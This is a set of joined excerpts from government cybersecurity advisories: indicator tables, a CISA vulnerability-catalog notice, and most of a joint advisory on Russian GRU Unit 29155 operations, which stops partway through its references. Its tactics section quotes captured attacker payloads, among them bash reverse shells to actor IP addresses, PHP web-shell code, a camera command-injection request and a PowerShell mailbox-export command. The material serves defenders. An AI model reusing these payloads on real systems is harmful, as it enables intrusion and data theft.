JCSA. The authoring organizations recommend using the below IP addresses to search for previous activity the actors may have conducted against networks. If positive hits for these IP addresses are identified, the authoring organizations recommend making an independent determination if the observed activity aligns with the TTPs outlined in the JCSA. The timeframes included in the table reflect the timeframe the actors likely used the IPs. Table 14: Network Indicators IP Address Date Range 95.181.234.12 01/30/2024 to 02/07/2024 95.181.234.25 01/30/2024 to 02/07/2024 173.239.232.20 10/06/2023 to 12/19/2023 172.98.71.191 10/15/2023 to 11/27/2023 102.129.235.127 10/21/2023 to 10/22/2023 188.126.94.60 10/22/2023 to 01/12/2024 149.40.50.45 10/26/2023 181.214.166.59 10/26/2023 212.102.39.212 10/26/2023 149.57.16.134 10/26/2023 to 10/27/2023 149.57.16.137 10/26/2023 to 10/27/2023 102.129.235.186 10/29/2023 to 11/08/2023 46.246.8.138 10/31/2023 to 01/26/2024 149.57.16.160 11/08/2023 149.57.16.37 11/08/2023 46.246.8.137 11/17/2023 to 01/25/2024 212.102.57.29 11/19/2023 to 01/17/2024 46.246.8.82 11/22/2023 to 01/28/2024 95.181.234.15 11/26/2023 to 02/07/2024 45.88.97.225 11/27/2023 to 02/11/2024 84.239.45.17 12/04/2023 to 12/07/2023 46.246.8.104 12/07/2023 to 02/07/2024 37.46.113.206 12/07/2023 46.246.3.186 12/07/2023 to 12/09/2023 46.246.8.141 12/07/2023 to 02/10/2024 46.246.8.17 12/09/2023 to 01/09/2024 37.19.197.182 12/15/2023 154.16.192.38 12/25/2023 to 01/24/2024 102.165.16.127 12/27/2023 to 01/28/2024 46.246.8.47 12/29/2023 to 01/29/2024 46.246.3.225 12/30/2023 to 02/06/2024 46.246.3.226 12/31/2023 to 02/03/2024 46.246.3.240 12/31/2023 to 02/06/2024 191.101.217.10 01/05/2024 102.129.153.182 01/08/2024 46.246.3.196 01/08/2024 102.129.152.60 01/09/2024 156.146.60.74 01/10/2024 191.96.227.113 01/10/2024 191.96.227.122 01/10/2024 181.214.166.132 01/11/2024 188.126.94.57 01/11/2024 to 01/13/2024 154.6.13.144 01/13/2024 to 01/24/2024 154.6.13.151 01/13/2024 to 01/28/2024 188.126.94.166 01/15/2024 89.149.38.204 01/18/2024 46.246.8.67 01/20/2024 46.246.8.53 01/22/2024 154.16.192.37 01/24/2024 191.96.150.14 01/24/2024 191.96.150.96 01/24/2024 46.246.8.10 01/24/2024 84.239.25.13 01/24/2024 154.6.13.139 01/26/2024 191.96.106.33 01/26/2024 191.96.227.159 01/26/2024 149.57.16.150 01/27/2024 191.96.150.21 01/27/2024 46.246.8.84 01/27/2024 95.181.235.8 01/27/2024 191.96.227.102 01/27/2024 to 01/28/2024 46.246.122.185 01/28/2024 146.70.102.3 01/29/2024 to 01/30/2024 46.246.3.233 01/30/2024 to 02/15/2024 46.246.3.239 01/30/2024 to 02/15/2024 188.126.89.35 02/03/2024 46.246.3.223 02/03/2024 46.246.3.245 02/05/2024 to 02/06/2024 191.96.150.50 02/09/2024 Table 15: Devices Device Type Description Samsung Galaxy A71 (SM-A715F) Registered with MFA Samsung SM-G998B Registered with MFA Samsung SM-M205F Registered with MFA
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. CVE-2024-8963 Ivanti Cloud Services Appliance (CSA) Path Traversal Vulnerability These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise. Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information. Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria.
Summary The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155) are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020. GRU Unit 29155 cyber actors began deploying the destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13, 2022. These cyber actors are separate from other known and more established GRU-affiliated cyber groups, such as Unit 26165 and Unit 74455. To mitigate this malicious cyber activity, organizations should take the following actions today: Prioritize routine system updates and remediate known exploited vulnerabilities. Segment networks to prevent the spread of malicious activity. Enable phishing-resistant multifactor authentication (MFA) for all externally facing account services, especially for webmail, virtual private networks (VPNs), and accounts that access critical systems. This Cybersecurity Advisory provides tactics, techniques, and procedures (TTPs) associated with Unit 29155 cyber actors—both during and succeeding their deployment of WhisperGate against Ukraine—as well as further analysis (see Appendix A) of the WhisperGate malware initially published in the joint advisory, Destructive Malware Targeting Organizations in Ukraine, published February 26, 2022. FBI, CISA, NSA and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber operations since 2020: U.S. Department of the Treasury U.S. Department of State (Rewards for Justice) U.S. Cyber Command Cyber National Mission Force (CNMF) Netherlands Defence Intelligence and Security Service (MIVD) Czech Military Intelligence (VZ) Czech Republic Security Information Service (BIS) German Federal Office for the Protection of the Constitution (BfV) Estonian Internal Security Service (KAPO) Latvian State Security Service (VDD) Security Service of Ukraine (SBU) Computer Emergency Response Team of Ukraine (CERT-UA) Canadian Security Intelligence Service (CSIS) Communications Security Establishment Canada (CSE) Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) United Kingdom National Cyber Security Centre (NCSC-UK) For additional information on Russian state-sponsored malicious cyber activity and related indictments, see the recent U.S. Department of Justice (DOJ) press releases for June 26, 2024, and September 5, 2024, FBI’s Cyber Crime webpage, and CISA’s Russia Cyber Threat Overview and Advisories webpage. Download the PDF version of this report: AA24-249A Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure (PDF, 1.01 MB ) For a downloadable copy of indicators of compromise (IOCs): AA24-249A STIX XML (XML, 321.47 KB ) AA24-249A STIX JSON (JSON, 201.39 KB ) Technical Details Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. GRU Unit 29155: Cyber Component FBI, NSA, and CISA assess Unit 29155 is responsible for attempted coups, sabotage and influence operations, and assassination attempts throughout Europe. Unit 29155 expanded their tradecraft to include offensive cyber operations since at least 2020. Unit 29155 cyber actors’ objectives appear to include the collection of information for espionage purposes, reputational harm caused by the theft and leakage of sensitive information, and systematic sabotage caused by the destruction of data [T1485]. FBI assesses the Unit 29155 cyber actors to be junior active-duty GRU officers under the direction of experienced Unit 29155 leadership. These individuals appear to be gaining cyber experience and enhancing their technical skills through conducting cyber operations and intrusions. Additionally, FBI assesses Unit 29155 cyber actors rely on non-GRU actors, including known cyber-criminals and enablers to conduct their operations. Cybersecurity Industry Tracking The cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to Unit 29155 cyber actors. While not all encompassing, the following are the most notable threat group names related under MITRE ATT&CK G1003 and commonly used within the cybersecurity community. Cadet Blizzard (formerly known as DEV-0586 by Microsoft)[1],[2] Ember Bear (also known as Bleeding Bear by CrowdStrike)[3] Frozenvista UNC2589[4] UAC-0056[5] Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. Government’s understanding for all activity related to these groupings. Victimization In addition to WhisperGate and other incidents against Ukraine, Unit 29155 cyber actors have conducted computer network operations against numerous members of the North Atlantic Treaty Organization (NATO) in Europe and North America, as well as countries in Europe, Latin America, and Central Asia. The activity includes cyber campaigns such as website defacements, infrastructure scanning, data exfiltration, and data leak operations. These actors sell or publicly release exfiltrated victim data obtained from their compromises. Since early 2022, the primary focus of the cyber actors appears to be targeting and disrupting efforts to provide aid to Ukraine. To date, the FBI has observed more than 14,000 instances of domain scanning across at least 26 NATO members and several additional European Union (EU) countries. Unit 29155 cyber actors have defaced victim websites and used public website domains to post exfiltrated victim information. Whether through offensive operations or scanning activity, Unit 29155 cyber actors are known to target critical infrastructure and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors of NATO members, the EU, Central American, and Asian countries. TTP Overview Reconnaissance Unit 29155 cyber actors have been observed targeting IP ranges [T1595.001] used within multiple government and critical infrastructure organizations. The following are publicly available tools these cyber actors have used for scanning [T1595] and vulnerability exploit efforts. Unit 29155 cyber actors were not observed using these tools outside of their intended purpose. Note: Use of these tools should not be attributed as malicious without analytical evidence to support threat actor use and/or control. Acunetix: Unit 29155 cyber actors leveraged both Acunetix and Nmap to identify open ports, services, and vulnerabilities for networks [T1595.002].[6] Amass: Unit 29155 cyber actors leveraged both Amass and VirusTotal to obtain subdomains for target websites [T1590.002].[7] Droopescan[8] JoomScan[9] MASSCAN: Unit 29155 cyber actors used MASSCAN and Nmap to discover other machines once inside victim networks.[10] Netcat[11] Nmap: Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the Nmap Scripting Engine [NSE]) to write custom scripts for discovering and scanning other machines [T1046]. Shodan: Unit 29155 cyber actors used Shodan to identify hosts with a specific set of vulnerabilities or device types [T1596.005].[12] VirusTotal[13] WPScan Additionally, Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration [T1572] over port 1194, and in some instances, to perform Active Directory (AD) enumeration. Adminer in combination with Impacket and ldapdomaindump were tools used for gathering information on AD. Once active devices are found, Unit 29155 cyber actors look for vulnerabilities to exploit. For example, the Acunetix vulnerability scanning tool has been used for gathering information on potential vulnerabilities such as blind cross-site scripting, as shown in the following commands: GET /index.php?log=to@example.com>%0d%0abcc:009247.3183-377.3183.1bf6c.19446.2@bxss.me "GET /CMS/files/log.htm HTTP/1.1" * * "(nslookup hitccruvbrumn76c1b.bxss.me||perl -e \"gethostbyname('hitccruvbrumn76c1b.bxss.me')\")" As the cyber actors perform reconnaissance on victim networks and discover vulnerabilities within victim web servers or machines, they obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure [T1588.005]. Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for, but not exploiting, the following CVEs: CVE-2020-1472 (Microsoft: Windows Server) CVE-2021-26084 (Atlassian Confluence Server and Data Center) CVE-2021-3156 (Red Hat: Privilege Escalation via Command Line Argument Parsing) CVE-2021-4034 (Red Hat: Polkit Privilege Escalation) CVE-2022-27666 (Red Hat: Heap Buffer Overflow Flaw) Analysis concluded Unit 29155 cyber actors have exploited the following CVEs for initial access [T1190], as detailed throughout this advisory: CVE-2021-33044 (Dahua Security) CVE-2021-33045 (Dahua Security) CVE-2022-26134 (Atlassian Confluence Server and Data Center) CVE-2022-26138 (Atlassian Confluence Server and Data Center) CVE-2022-3236 (Sophos: Firewall) Resource Development Rather than build custom solutions, Unit 29155 cyber actors use common red teaming techniques and publicly available tools to conduct cyber operations. As a result, many TTPs overlap with those of other cyber actors, which can lead to misattribution. Unit 29155 actors and their cyber-criminal affiliates commonly maintain accounts on dark web forums; this has provided the opportunity to obtain various hacker tools such as malware and malware loaders [T1588.001] like Raspberry Robin and SaintBot. While Unit 29155 cyber actors are best known for their use of WhisperGate malware against Ukraine, the use of WhisperGate is not unique to the group. Technical analysis can be found in Appendix A: WhisperGate Malware Analysis. Initial Access Unit 29155 cyber actors are known to use VPNs to anonymize their operational activity. These cyber actors commonly attempt to exploit weaknesses in internet-facing systems, like the CVEs listed above, to initially access networks. In one instance, Unit 29155 cyber actors exploited CVE-2021-33044 and CVE-2021-33045 on Dahua IP cameras to bypass identity authentication. Lateral Movement Unit 29155 cyber actors have used Shodan to scan for Internet of Things (IoT) devices, using exploitation scripts to authenticate to IP cameras with default usernames and passwords [T1078.001], and exfiltrating images [T1125] (JPG files). Attempts are then made to perform remote command execution via web to vulnerable IP cameras; if successful, cyber actors would dump configuration settings and credentials in plaintext (as shown in Table 1 below) [T1552.001]. Appendix B: Indicators of Compromise lists threat actor IP addresses associated with the activity detailed in this section. Note: These events are independent and not correlated as a single timeline of compromise. Event Victim Observation Web requests observed from victim infrastructure These requests are likely intended to dump configuration settings and credentials [T1003]: hxxp://:/PictureCatch.cgi?username=&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1&channel=1&secret=1&key=PWNED hxxp://:/ssi.cgi/tmp/Login.htm POST requests sent to victims with payloads [T1071.001] "txtUser=lol&txtPassword=2&btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties&chRemember=on&txtPassword=g00dPa%24%24w0rD&txtUser=$%7b@print(system(%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F179.43.175.38%2F6870%200%3E%261%22))%7d" "txtUser=lol&txtPassword=2&btConnect=Piesl%C4%93gtiesbtConnect=Piesl%C4%93gties&chRemember=on&txtPassword=g00dPa%24%24w0rD&txtUser=$%7b@print(system(%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F81.17.24.130%2F6870%200%3E%261%22))%7d" URL encoded values from txtUser for both commands decoded to embedded bash commands ${@print(system("bash -i >& /dev/tcp/179.43.175.38/6870 0>&1"))} ${@print(system("bash -i >& /dev/tcp/81.17.24.130/6870 0>&1"))} In addition, incident analysis identified the general observations listed below on victim infrastructure. Each event should be considered independent and may have been used by Unit 29155 cyber actors against multiple victims at different dates and timeframes. Appendix B: Indicators of Compromise lists IOCs associated with the observations in Table 1 and below. In one instance shortly following a deployment of WhisperGate malware, Unit 29155 cyber actors exfiltrated data to mega[.]nz using Rclone [T1567.002]. Unit 29155 cyber actors used a Pass-the-Hash [T1550.002] via ProxyChains. Cyber actors performed SSH and SSHPass executions. Cyber actors initiated a web request and executed commands via ProxyChains. This included obtaining NT hashes via Server Message Block (SMB) using smbclient, executing Windows Management Instrumentation (WMI) with hashes, and making web requests with resources i.php and tunnel.jsp. In one instance, cyber actors used smbclient via ProxyChains to access internal network shares, and subsequently PSQL and MySQL clients to access internal databases. Cyber actors used Impacket for post-exploitation and lateral movement. The script secretsdump.py was used from the Impacket framework to obtain domain credentials, while psexec.py was subsequently used to move laterally within a victim network. Cyber actors used ntlmrelayx.py via Impacket and krbrelayx.py, which requires Impacket to function. Cyber actors used Responder.py. Cyber actors used su-bruteforce to brute force a selected user using the su command. Cyber actors used BloodHound, an open source AD reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment. Cyber actors used CrackMapExec via ProxyChains with SMB protocol targeting internal victim IP addresses. This open source post-exploitation tool automates assessing the security of large AD networks. Cyber actors used LinPEAS, an open source script designed to automate the process of searching for potential privilege escalation vulnerabilities on a Linux victim. Cyber actors used GO Simple Tunnel (GOST) (MD5: 896e0f54fc67d72d94b40d7885f10c51) for 30 days within one incident and against additional victims on various occasions. GOST is a tunneling tool designed to establish secure connections between clients and servers, allowing for secure data transmission over untrusted networks. Cyber actors used Through the Wire against a victim’s internet-facing Confluence server. Through the Wire is a proof of concept[14] exploit for CVE-2022-26134, an OGNL injection vulnerability allowing an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. All versions of Confluence Server and Data Center prior to the fixed versions listed by Atlassian are affected by this vulnerability.[15] A reverse shell over HTTPS was used to communicate over listening host on port 8081. Cyber actors initiated Nmap scans on localized web servers. Cyber actors performed lateral movement from compromised web servers to exploit a corporate Microsoft Windows network, commonly using psexec.py from the Impacket framework. The script secretsdump.py from the Impacket framework was used to obtain domain credentials. Cyber actors may have used Raspberry Robin malware in the role of an access broker [T1588.001]. Cyber actors targeted victims’ Microsoft Outlook Web Access (OWA) infrastructure with password spraying to obtain valid usernames and passwords [T1110.003]. Command and Control Infrastructure Since at least 2020, Unit 29155 cyber actors have used virtual private servers (VPSs) [T1583.003] to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. Use of VPSs are common due to the associated IP addresses not identifying their true country of origin. Post-Exploitation When an exploit is successfully executed on a victim system, the actors can then launch a Meterpreter payload [T1105], which commonly uses a reverse Transmission Control Protocol (TCP) connection to initiate communication with the threat actors’ infrastructure [T1095]. In one instance, an established reverse TCP session was observed from victim to actor infrastructure via the following ports: 1234 1851 43221 443 4444 4688 5432 8080 8081 8082 8084 8085 8088 8089 8090 8443 8487 8888 Additional observations were collected from victim engagement and analysis, including: Use of the Metasploit Framework to search for and/or access modules such as mysql, postgres, and ssh software and features. Use of Meterpreter and Netcat to execute reverse shells over ports such as 8081. Use of Impacket. Use of PHP (exp_door v1.0.2, b374k, WSO 4.0.5) and the P.A.S. web shells [T1505.003], likely for initial access. Use of EternalBlue.[16],[17] Use of reGeorg or Neo-reGeorg to set up a proxy to tunnel network traffic following compromise of a victim website, as well as use of ProxyChains to run Nmap within the network. Encrypted Communication Once Unit 29155 cyber actors gain access to the victims’ internal network, the victims have observed: Using Domain Name System (DNS) tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic [T1071.004]. For example, Iodine was used to tunnel data via dns.test658324901domain.me. Configuring a proxy within the victim infrastructure and executing commands within the network via ProxyChains. ProxyChains—a tool used to route internal traffic through a series of proxies [T1090.003]—has been used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports. The following ports used by actor infrastructure include: 1080 1333 13381 13391 13666 13871 1448 1888 3130 3140 4337 50001 8079 Using the GOST open source tunneling tool (via SOCKS5 proxy) named java, as detailed in the following running processes in victim incident response results: 8212 - SJ 0:02.54 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME=/ RC PID=33980 ./java –L socks5://127.0.0.1:13338 8282 - IJ 0:03.98 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME=/ RC_PID=33980 ./java –L rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://{IP Address}:7896 Modifying .php scripts to manipulate server-side operations, such as the observations listed in Table 2 below. Script (Base64 Decoded) Command Purpose usr/local/www/apache24/data/-redacted-/plugins/extension/oomla/oomla.php if (isset($ POST ["sessionsid_wp"] )) { $poll id = $ POST ["sessionsid_wp") ; $sessii = explode(":", base64_decode($poll_id)) ;$sock=fsockopen($sessii[O) ,$sessii[l)); $proc=proc_open(/bin/sh -i), array(O=>$sock, l=>$sock, 2=>$sock) ,$pipes); } Creates session. Usr/local/www/apache24/data/-redacted-/plugins/authentication/joomla/oomla.php function nb_res($a) { eval(system('base64 decode ($a) '); } Allows program to run. Usr/local/www/apache24/data/-redacted-/plugins/privacy/contact/contact.php if (isset($_POST['fl'])) { $fl=$_POST['fl'] ; $f2=$_POST['f2'] ; $content = base64 decode($fl); $h = fopen($f2."w"); $text = "$content"; fwrite($h.$text) ; fclose ($h) ; } Allows writing to files. Exfiltration In several instances, analysis identified Unit 29155 cyber actors compressing victim data [T1560] (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure. These cyber actors commonly use the command-line program Rclone to exfiltrate data to a remote location from victim infrastructure. Unit 29155 cyber actors have exfiltrated Windows processes and artifacts, such as Local Security Authority Subsystem Service (LSASS) memory dumps [T1003.001], Security Accounts Manager (SAM) files [T1003.002], and SECURITY and SYSTEM event log files [T1654]. As seen in victim incident response results, actor infrastructure has also been used to compromise multiple mail servers [T1114] and exfiltrate mail artifacts, such as email messages, using PowerShell [T1059.001] via the following command: powershell New-MailboxExportRequest – Mailbox – FilePath `\\{IP Address}\sharefolder\1.pst` MITRE ATT&CK Tactics and Techniques See Table 3 to Table 14 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 3: Reconnaissance Technique Title ID Use Gather Victim Network Information: DNS T1590.002 Unit 29155 cyber actors have used Amass and VirusTotal to obtain information about victims’ DNS for possible use during targeting, such as subdomains for target websites. Active Scanning T1595 Unit 29155 cyber actors use publicly available tools to gather information for possible use during targeting. Active Scanning: Scanning IP Blocks T1595.001 Unit 29155 cyber actors use various open source scanning tools to scan for victim IP ranges. Active Scanning: Vulnerability Scanning T1595.002 Unit 29155 cyber actors use publicly available scanning tools to enable their discovery of IoT devices and exploitable vulnerabilities. Tools leveraged for scanning include Acunetix, Amass, Droopescan, eScan, and JoomScan. Search Open Technical Databases: Scan Databases T1596.005 Unit 29155 cyber actors use publicly available platforms like Shodan to identify internet connected hosts. Table 4: Resource Development Technique Title ID Use Acquire Infrastructure: Virtual Private Server T1583.003 Unit 29155 cyber actors have used VPSs to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. Obtain Capabilities: Malware T1588.001 Unit 29155 cyber actors obtain publicly available malware and malware loaders to support their operations. For example, analysis suggests Raspberry Robin malware may have been used in the role of an access broker. Obtain Capabilities: Exploits T1588.005 Unit 29155 cyber actors are known to obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure. Table 5: Initial Access Technique Title ID Use Valid Accounts: Default Accounts T1078.001 Unit 29155 cyber actors use exploitation scripts to authenticate to IP cameras with default usernames and passwords. Exploit Public-Facing Application T1190 Unit 29155 cyber actors have used a variety of public exploits, including CVE-2021-33044, CVE-2021-33045, CVE-2022-26134, and CVE-2022-26138. The proof of concept exploit for CVE-2022-26134, Through the Wire, has also been used against a victim’s internet-facing Confluence server. Table 6: Execution Technique Title ID Use Command and Scripting Interpreter: PowerShell T1059.001 Unit 29155 cyber actors have used PowerShell to execute commands and other operational tasks. Table 7: Persistence Technique Title ID Use Server Software Component: Web Shell T1505.003 Unit 29155 cyber actors use web shells to establish persistent access to systems. Table 8: Credential Access Technique Title ID Use OS Credential Dumping: LSASS Memory T1003.001 Unit 29155 cyber actors have exfiltrated LSASS memory dumps to retrieve credentials from victim machines. OS Credential Dumping: Security Account Manager T1003.002 Unit 29155 cyber actors have exfiltrated usernames and hashed passwords from the SAM. Brute Force: Password Spraying T1110.003 Unit 29155 cyber actors targeted victims’ Microsoft OWA infrastructure with password spraying to obtain valid usernames and passwords. Unsecured Credentials: Credentials in Files T1552.001 Following exploitation of vulnerable IP cameras, Unit 29155 cyber actors dump configuration settings and credentials in plaintext. Table 9: Discovery Technique Title ID Use Network Service Discovery T1046 Once Unit 29155 cyber actors gained access to victim internal networks, they further used Nmap (via the NSE) to write custom scripts for discovering and scanning other machines. Log Enumeration T1654 Unit 29155 cyber actors have enumerated and exfiltrated SECURITY and SYSTEM logs. Table 10: Lateral Movement Technique Title ID Use Use Alternate Authentication Material: Pass the Hash T1550.002 Unit 29155 cyber actors used Pass-the-Hash to authenticate via SMB. Table 11: Collection Technique Title ID Use Email Collection T1114 Unit 29155 cyber actors have used their infrastructure to compromise multiple victims’ mail servers and exfiltrate mail artifacts, such as email messages. Video Capture T1125 Unit 29155 cyber actors have exploited IoT devices, specifically IP cameras with default usernames and passwords, and exfiltrated images. Data from Information Repositories: Confluence T1213.001 Unit 29155 cyber actors leveraged Through the Wire against the victim’s internet-facing Confluence server. Archive Collected Data T1560 Unit 29155 cyber actors compress victim data (e.g., the entire filesystem, select file system artifacts or user data, and/or database dumps) to send back to their infrastructure. Table 12: Command and Control Technique Title ID Use Proxy: Multi-hop Proxy T1090.003 Unit 29155 cyber actors executed commands via ProxyChains—a tool used to route internal traffic through a series of proxies. ProxyChains was also used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports. Application Layer Protocol: Web Protocols T1071.001 Unit 29155 cyber actors use POST requests over HTTP to send payloads to victims. Application Layer Protocol: DNS T1071.004 Unit 29155 cyber actors used DNS tunneling tools, such as dnscat/2 and Iodine, to tunnel IPv4 network traffic. Non-Application Layer Protocol T1095 Unit 29155 cyber actors commonly use a reverse TCP connection to initiate communication with their infrastructure. Ingress Tool Transfer T1105 When an exploit is successfully executed on a victim system, Unit 29155 cyber actors are known to launch the Meterpreter payload to initiate communication with their actor-controlled systems. Protocol Tunneling T1572 Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration to tunnel traffic over a single port (1194), VPNs, and GOST to anonymize their operational activity. Table 13: Exfiltration Technique Title ID Use Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Unit 29155 cyber actors exfiltrated data to the cloud storage and file hosting service, MEGA (mega[.]nz), using Rclone. Table 14: Impact Technique Title ID Use Data Destruction T1485 Unit 29155 cyber actors’ objectives include the destruction of data. Mitigations The authoring agencies recommend organizations implement the mitigations supplied below to improve organizational cybersecurity posture based on threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Limit Adversarial Use of Common Vulnerabilities Prioritize patching to CISA’s Known Exploited Vulnerabilities Catalog, especially for CVEs identified in this advisory, and then critical and high vulnerabilities that allow for remote code execution on internet-facing devices. Conduct regular automated vulnerability scans to perform vulnerability assessments on all network resources based on threat actor behaviors and known exploitable vulnerabilities (CISA CPG 1.E). Limit exploitable services on internet-facing assets, such as email and remote management protocols (CISA CPGs 2.M, 2.W). Where necessary services must be exposed, such as services hosted in a demilitarized zone (DMZ), implement the appropriate compensatory controls to prevent common forms of abuse and exploitation. Disable all unnecessary operating system applications and network protocols to combat adversary enumeration. For additional guidance, see CISA Insights: Remediate Vulnerabilities for Internet-Accessible Systems. U.S. organizations can utilize a range of CISA services at no cost, including vulnerability scanning and testing, to help organizations reduce exposure to threats. CISA Cyber Hygiene services can provide additional review of internet-accessible assets and provide regular reports on steps to take to mitigate vulnerabilities. Email vulnerability@cisa.dhs.gov with the subject line, “Requesting Cyber Hygiene Services,” to get started. Software manufacturers, vendors, and consumers are encouraged to review CISA and NIST’s Defending Against Supply Chain Attacks. This publication provides an overview of software supply chain risks and recommendations for how software customers and vendors can use the NIST Cyber Supply Chain Risk Management (C-SCRM) Framework and the Secure Software Development Framework (SSDF) to identify, assess, and mitigate software supply chain risks. CISA recommends comprehensive mitigations for supply chain incident reporting, vulnerability disclosing (e.g., security.txt), and choosing a trusted supplier or vendor that observes proper cyber security hygiene (CISA CPG 1.G, 1.H, 1.I) to defend against upstream attacks. Deploy Protective Controls and Architecture Implement network segmentation. Network segmentation can help prevent lateral movement by controlling traffic flows between—and access to—various subnetworks (CISA CPG 2.F). Best practice mitigations include updating Identity and Access Management (IAM) and employing phishing-resistant MFA for all devices and accounts identified as organizational assets. For additional guidance, see CISA and NSA’s IAM Recommended Best Practices Guide for Administrators (CISA CPG 2.H). Verify and ensure that sensitive data, including credentials, are not stored in plaintext and can only be accessed by authenticated and authorized users. Credentials must be stored in a secure manner, such as with a credential/password manager to protect from malicious enumeration (CISA CPG 2.L). Disable and/or restrict use of command line and PowerShell activity. Update to the latest version and uninstall all earlier PowerShell versions (CISA CPG 2.N). Implement a continuous system monitoring program, such as security information and event management (SIEM) or endpoint detection and response (EDR) solutions, to comprehensively log and review all authorized external access connections. This logging will better ensure the prompt detection of misuse or abnormal activity (CISA CPG 2.T). Monitor for unauthorized access attempts and programming anomalies through comprehensive logging that is secured from modification, such as limiting permissions and adding redundant remote logging (CISA CPG 2.U). Security appliances should be set to detect and/or block Impacket framework indicators, PSExec or WMI commands, and suspicious PowerShell commands for timely identification and remediation. Identify any use of outdated or weak encryption, update these to sufficiently strong algorithms, and consider the implications of post-quantum cryptography (CISA CPG 2.K). Use properly configured and up-to-date Secure Socket Layer (SSL)/Transport Layer Security (TLS) to protect data in transit. Security Controls In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Table 3 to Table 14). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. Resources MITRE: WhisperGate CISA AA22-057A: Destructive Malware Targeting Organizations in Ukraine DOJ Press Release: Russian National Charged for Conspiring with Russian Military Intelligence to Destroy Ukrainian Government Computer Systems and Data FBI: Cyber Crime CISA: Russia Cyber Threat Overview and Advisories MITRE: Group G1003 - Ember Bear MITRE: Impacket NIST NVD: CVE-2020-1472 NIST NVD: CVE-2021-26084 NIST NVD: CVE-2021-3156 NIST NVD: CVE-2021-4034 NIST NVD: CVE-2022-27666 NIST NVD: CVE-2021-33044 NIST NVD: CVE-2021-33045 NIST NVD: CVE-2022-26134 NIST NVD: CVE-2022-26138 NIST NVD: CVE-2022-3236 MITRE: BloodHound MITRE: Rclone MITRE: P.A.S. Webshell CISA: Known Exploited Vulnerabilities Catalog CISA Insights: Remediate Vulnerabilities for Internet-Accessible Systems CISA, NIST: Defending Against Supply Chain Attacks CISA, NSA: IAM Recommended Best Practices Guide for Administrators References Microsoft Threat Intelligence Center: Destructive Malware Targeting Ukrainian Organizations Microsoft Threat Intelligence Center: Cadet Blizzard Emerges as a Novel and Distinct Russian Threat Actor CrowdStrike: 